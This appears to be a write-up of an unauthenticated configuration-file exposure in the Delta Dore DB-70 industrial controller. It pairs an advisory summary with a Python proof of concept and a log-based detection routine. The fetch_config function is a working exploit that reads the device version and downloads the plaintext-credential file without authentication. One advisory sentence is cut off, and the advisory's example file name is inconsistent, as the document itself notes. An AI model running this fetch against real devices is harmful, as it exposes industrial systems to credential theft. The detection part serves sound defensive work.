Unauthenticated Configuration File Exposure via Predictable URL in DB-70 / CVE pending
The Delta Dore DB-70 is an industrial IP controller. It stores its configuration file at a static path on its embedded web server, and the file name is predictable: "DB-70_WSA_" + the application version with the dots removed + "_config.bin". The advisory gives the following example for application version 01.04.00 (note that the example string does not match the stated rule, which would yield "010400"; the file name is reproduced here exactly as given):

http://xx.yy.zz.tt:8080/admin/DB-70_WSA_010104_config.bin

The device also exposes its application version on the "informations.shtm" page without requiring authentication, so anyone who can reach the web interface can read the version. Combining the two, an unauthenticated attacker can construct the URL of the configuration file and download it without any credentials.

The configuration file contains the device username and password in plain text, which is a significant security risk. It exposes the device to potential denial-of-service attac...
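The following script is an added example, not code from the advisory or from Delta Dore. It applies the naming rule exactly as the advisory states it (version with the dots removed), so for 01.04.00 it produces "010400" rather than the "010104" shown in the advisory's own example URL. The HTML snippet standing in for informations.shtm, the host 192.0.2.10 and the web-server log lines are all constructed for the example; the real page markup is not reproduced in the advisory. The network fetch is kept in a separate function so the parsing and URL construction can be exercised offline, and a small log check shows how a defender would spot a successful download of the file.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import urljoin
from urllib.request import Request, urlopen

# Constructed stand-in for the unauthenticated informations.shtm page.
# The actual markup of the DB-70 page is not given in the advisory; this is an assumption.
SAMPLE_INFORMATIONS_HTML = """
<html><body>
<table>
<tr><td>Product</td><td>DB-70</td></tr>
<tr><td>Application version</td><td>01.04.00</td></tr>
</table>
</body></html>
"""

# Version strings on the page are assumed to look like NN.NN.NN (as in the advisory's 01.04.00).
VERSION_RE = re.compile(r"\b(\d{2}\.\d{2}\.\d{2})\b")


def extract_version(html: str) -> Optional[str]:
    """Return the first NN.NN.NN version string found on the informations page, or None."""
    m = VERSION_RE.search(html)
    return m.group(1) if m else None


def config_filename(version: str) -> str:
    """Apply the advisory's naming rule: 'DB-70_WSA_' + version without dots + '_config.bin'."""
    if not VERSION_RE.fullmatch(version):
        raise ValueError(f"unexpected version format: {version!r}")
    return f"DB-70_WSA_{version.replace('.', '')}_config.bin"


def config_url(base_url: str, version: str) -> str:
    """Build the predictable URL under /admin/ on the device's web server."""
    return urljoin(base_url, "/admin/" + config_filename(version))


def fetch_config(base_url: str, timeout: float = 5.0) -> Tuple[str, Optional[bytes]]:
    """Network path (not exercised offline): read the version page, derive the URL,
    then request the configuration file without any credentials.
    Returns (url, body) where body is None if the request does not succeed."""
    info_url = urljoin(base_url, "/informations.shtm")
    with urlopen(Request(info_url), timeout=timeout) as resp:
        version = extract_version(resp.read().decode("utf-8", "replace"))
    if version is None:
        raise RuntimeError("could not read application version from informations.shtm")
    url = config_url(base_url, version)
    try:
        with urlopen(Request(url), timeout=timeout) as resp:
            return url, resp.read()
    except OSError:
        return url, None


# Defender side: flag successful unauthenticated downloads of the config file in web logs.
# Log format assumed to be Apache/NCSA common log format (constructed sample below).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD) (/admin/DB-70_WSA_\d{6}_config\.bin)\S* HTTP/[\d.]+" (\d{3})')

SAMPLE_LOG_LINES = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /informations.shtm HTTP/1.1" 200 1834',
    '203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /admin/DB-70_WSA_010400_config.bin HTTP/1.1" 200 4096',
    '198.51.100.9 - - [01/Jan/2024:10:05:00 +0000] "GET /admin/DB-70_WSA_010400_config.bin HTTP/1.1" 404 210',
    '203.0.113.7 - - [01/Jan/2024:10:06:00 +0000] "GET /index.shtm HTTP/1.1" 200 900',
]


def find_config_downloads(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (client_ip, path) for every request of the config file that was served with 200."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m.group(3) == "200":
            hits.append((m.group(1), m.group(2)))
    return hits


if __name__ == "__main__":
    v = extract_version(SAMPLE_INFORMATIONS_HTML)
    print("version:", v)
    print("config URL:", config_url("http://192.0.2.10:8080", v))
    print("downloads seen in log:", find_config_downloads(SAMPLE_LOG_LINES))
```

Running the script offline prints the derived URL for the constructed sample and the one log line in which the configuration file was actually served; pointing fetch_config at a real device is only appropriate on equipment you are authorised to test.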